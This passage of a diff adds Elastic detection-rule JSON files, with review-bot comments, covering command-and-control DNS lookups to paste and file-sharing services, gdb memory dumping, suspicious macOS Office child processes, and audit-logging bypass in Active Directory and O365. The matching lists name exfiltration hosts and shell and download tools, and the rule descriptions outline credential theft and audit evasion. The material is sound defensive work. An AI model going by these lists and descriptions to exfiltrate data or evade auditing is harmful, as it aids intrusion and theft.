Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with 
legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"github.com\",\n \"pastebin.*\",\n \"paste4btc.com\",\n \"paste.ee\",\n \"ghostbin.com\",\n \"drive.google.com\",\n \"?.docs.live.net\",\n \"api.dropboxapi.*\",\n \"content.dropboxapi.*\",\n \"dl.dropboxusercontent.*\",\n \"api.onedrive.com\",\n \"*.onedrive.org\",\n \"onedrive.live.com\",\n \"filebin.net\",\n \"*.ngrok.io\",\n \"ngrok.com\",\n \"*.portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n 
\"controlc.com\",\n \"requestbin.net\",\n \"slack.com\",\n \"api.slack.com\",\n \"slack-redir.net\",\n \"slack-files.com\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"apis.azureedge.net\",\n \"cdn.sql.gg\",\n \"?.top4top.io\",\n \"top4top.io\",\n \"www.uplooder.net\",\n \"*.cdnmegafiles.com\",\n \"transfer.sh\",\n \"gofile.io\",\n \"updates.peer2profit.com\",\n \"api.telegram.org\",\n \"t.me\",\n \"meacz.gq\",\n \"rwrd.org\",\n \"*.publicvm.com\",\n \"*.blogspot.com\",\n \"api.mylnikov.org\",\n \"file.io\",\n \"stackoverflow.com\",\n \"*files.1drv.com\",\n \"api.anonfile.com\",\n \"*hosting-profi.de\",\n \"ipbase.com\",\n \"ipfs.io\",\n \"*up.freeo*.space\",\n \"api.mylnikov.org\",\n \"script.google.com\",\n \"script.googleusercontent.com\",\n \"api.notion.com\",\n \"graph.microsoft.com\",\n \"*.sharepoint.com\",\n \"mbasic.facebook.com\",\n \"login.live.com\",\n \"api.gofile.io\",\n \"api.anonfiles.com\",\n \"api.notion.com\",\n \"api.trello.com\",\n \"gist.githubusercontent.com\",\n \"files.pythonhosted.org\",\n \"g.live.com\",\n \"*.zulipchat.com\",\n \"graph.microsoft.com\") and \n \n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n 
\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) and process.code_signature.trusted == true\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n ) or \n\n /* Dropbox */\n (process.name : \"Dropbox.exe\" and (process.code_signature.subject_name : \"Dropbox, Inc\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.dropboxapi.com\", \"*.dropboxusercontent.com\")\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n )\n ) \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66883649-f908-4a5b-a1e0-54090a1d3a32", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + "reference": "https://attack.mitre.org/techniques/T1102/" + }, + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + "subtechnique": [ + { + "id": "T1567.001", + "name": "Exfiltration to Code Repository", + "reference": "https://attack.mitre.org/techniques/T1567/001/" + }, + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + 
} + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "66883649-f908-4a5b-a1e0-54090a1d3a32_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_2.json b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_2.json new file mode 100644 index 00000000000..b197bbc4e8e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_2.json 
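Review bot: The `dns.question.name` list in the query contains duplicate entries — `api.mylnikov.org`, `api.notion.com` and `graph.microsoft.com` each appear twice — which adds nothing to matching but makes the list harder to maintain; the second occurrence of each should be dropped. The query also carries trailing whitespace on several continuation lines (`and \n \n` before the false-positive block and `) or \n` after each exclusion) that a formatter would strip. Since this list is the rule's core set of watched services, keeping it de-duplicated and sorted would make future additions under the `/* Add new WebSvc domains here */` marker easier to review.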
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for potential memory dumping through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux Process Hooking via GDB", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and \n/* Covered by d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f */\nprocess.args != \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66c058f3-99f4-4d18-952b-43348f2577a0", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "66c058f3-99f4-4d18-952b-43348f2577a0_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_3.json b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_3.json new file mode 100644 index 00000000000..6edd3236ef1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_3.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for potential memory dumping through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux Process Hooking via GDB", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and \n/* Covered by d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f */\nprocess.args != \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66c058f3-99f4-4d18-952b-43348f2577a0", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "66c058f3-99f4-4d18-952b-43348f2577a0_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_106.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_106.json new file mode 100644 index 00000000000..aeb5b2a1f18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_106.json 
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, and Excel). These child processes are often launched during exploitation of Office applications or by documents with malicious macros.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious macOS MS Office Child Process", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.parent.name:(\"Microsoft Word\", \"Microsoft PowerPoint\", \"Microsoft Excel\") and\n process.name:\n (\n \"bash\",\n \"dash\",\n \"sh\",\n \"tcsh\",\n \"csh\",\n \"zsh\",\n \"ksh\",\n \"fish\",\n \"python*\",\n \"perl*\",\n \"php*\",\n \"osascript\",\n \"pwsh\",\n \"curl\",\n \"wget\",\n \"cp\",\n \"mv\",\n \"base64\",\n \"launchctl\"\n ) and\n /* noisy false positives related to product version discovery and office errors reporting */\n not process.args:\n (\n \"ProductVersion\",\n \"hw.model\",\n \"ioreg\",\n \"ProductName\",\n \"ProductUserVisibleVersion\",\n \"ProductBuildVersion\",\n \"/Library/Application Support/Microsoft/MERP*/Microsoft Error Reporting.app/Contents/MacOS/Microsoft Error Reporting\"\n )\n", + "references": [ + "https://blog.malwarebytes.com/cybercrime/2017/02/microsoft-office-macro-malware-targets-macs/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"66da12b1-ac83-40eb-814c-07ed1d82b7b9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "66da12b1-ac83-40eb-814c-07ed1d82b7b9_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_9.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_9.json new file mode 100644 index 00000000000..b77be0ff015 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_9.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Modification of the msPKIAccountCredentials", + "query": "event.action:\"Directory Service Changes\" and event.code:\"5136\" and\n winlog.event_data.AttributeLDAPDisplayName:\"msPKIAccountCredentials\" and winlog.event_data.OperationType:\"%%14674\" and\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\"\n", + "references": [ + "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", + "https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.OperationType", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy 
must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Data Source: Active Directory", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 9 + }, + "id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_103.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_103.json new file mode 100644 index 00000000000..eba65d4a0a3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_103.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account.", + "false_positives": [ + "Legitimate allowlisting of noisy accounts" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Mailbox Audit Logging Bypass", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", + "references": [ + "https://twitter.com/misconfig/status/1476144066807140355" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + 
"Tactic: Initial Access", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_105.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_105.json new file mode 100644 index 00000000000..16b5cb248fb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_105.json 
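Review bot: The `note` field in 675239ea-c1bc-4467-a6d3-b9e2cc7f676d_103.json is an empty string, so this medium-severity rule ships with no triage guidance, while comparable rules in this diff (for example 67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112.json) carry a full "Triage and analysis" section in `note`. The only entry in `references` is a single tweet, which is an ephemeral source for a rule that detects a deliberate audit-logging bypass; adding the vendor documentation for the `Set-MailboxAuditBypassAssociation` cmdlet would give responders something durable to consult. The same empty `note` and single reference appear in the _105 and _206 files in the two following hunks, so whatever is added should go into all three (or, if these files are produced from the upstream rule definitions, into that source).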
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account.", + "false_positives": [ + "Legitimate allowlisting of noisy accounts" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Mailbox Audit Logging Bypass", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", + "references": [ + "https://twitter.com/misconfig/status/1476144066807140355" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + 
"Tactic: Initial Access", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_206.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_206.json new file mode 100644 index 00000000000..8b1e2954283 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_206.json 
